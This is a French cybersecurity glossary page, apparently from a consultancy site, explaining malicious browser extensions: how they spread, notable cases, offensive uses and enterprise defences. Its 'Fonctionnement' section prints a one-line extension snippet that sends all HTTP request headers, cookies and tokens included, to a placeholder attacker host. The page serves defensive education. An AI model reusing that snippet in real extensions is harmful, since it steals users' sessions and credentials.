Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

Browser Extension Malware

hacking

Définition

Les extensions de navigateur malveillantes (Browser Extension Malware) exploitent les permissions étendues accordées aux extensions de navigateur pour espionner les utilisateurs, voler des credentials, injecter des publicités, modifier des pages web, et effectuer du cryptomining. Avec plus de 3 milliards d'utilisateurs Chrome et Firefox, la compromission via des extensions malveillantes touche des millions de victimes. Les extensions de navigateur ont accès à des permissions puissantes selon ce que l'utilisateur accepte lors de l'installation : lecture de tout le trafic web (tabs, cookies, requêtes réseau), modification du DOM des pages, accès au presse-papiers, exécution de scripts dans les pages visitées, et communication avec des serveurs distants. Une extension avec 'Accéder à vos données sur tous les sites web' peut intercepter les credentials tapés sur n'importe quel site. Des vecteurs d'infection incluent : des extensions légitimes compromises (rachat d'une extension populaire par un acteur malveillant, puis mise à jour avec du code malveillant), des extensions se faisant passer pour des extensions populaires (bloqueurs de pub, outils de capture d'écran), des extensions proposées via des publicités ou des sites de phishing, et des extensions légitimes avec un écosystème de plugins malveillants. Des cas notables incluent : Great Suspender (extension Chrome populaire achetée et transformée en malware en 2020), une série d'extensions 'bloqueur de pub' malveillantes qui volaient les cookies de session Google et Facebook, et des extensions spécifiquement ciblant les portefeuilles crypto (MetaMask clones, portefeuilles hardware fake). Les entreprises protègent leurs environnements en imposant des politiques d'extensions via les MDM (Mobile Device Management), en limitant les extensions aux seules approuvées par le service IT, et en surveillant les installations d'extensions via les outils EDR.

Fonctionnement

Une extension malveillante avec permission 'webRequest' intercepte toutes les requêtes HTTP : chrome.webRequest.onBeforeSendHeaders.addListener(function(details){fetch('https://attaquant.com/log',{method:'POST',body:JSON.stringify(details.requestHeaders)});}, {urls:['']}, ['requestHeaders','blocking']). Tous les headers HTTP (incluant cookies de session, tokens d'authentification) sont exfiltrés vers l'attaquant pour chaque requête vers chaque site web visité.

Exploitation offensive

Les extensions malveillantes pour crypto wallets (faux MetaMask, Ledger Live) volent les seed phrases entrées par les victimes, compromettant immédiatement tous les actifs crypto. Des extensions de capture d'écran ou de 'productivité' avec des permissions larges peuvent fonctionner comme des keyloggers et des screen recorders discrets, particulièrement dangereuses dans des contextes professionnels.

Détection et mitigation

Les entreprises devraient déployer des politiques Group Policy ou MDM qui restreignent les extensions aux seules approuvées (whitelist basée sur l'ID d'extension Chrome). Les EDR modernes (CrowdStrike, SentinelOne) surveillent les processus d'extension de navigateur et leurs communications réseau. Les utilisateurs devraient vérifier les permissions demandées avant d'installer une extension et éviter les extensions en dehors des stores officiels.

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis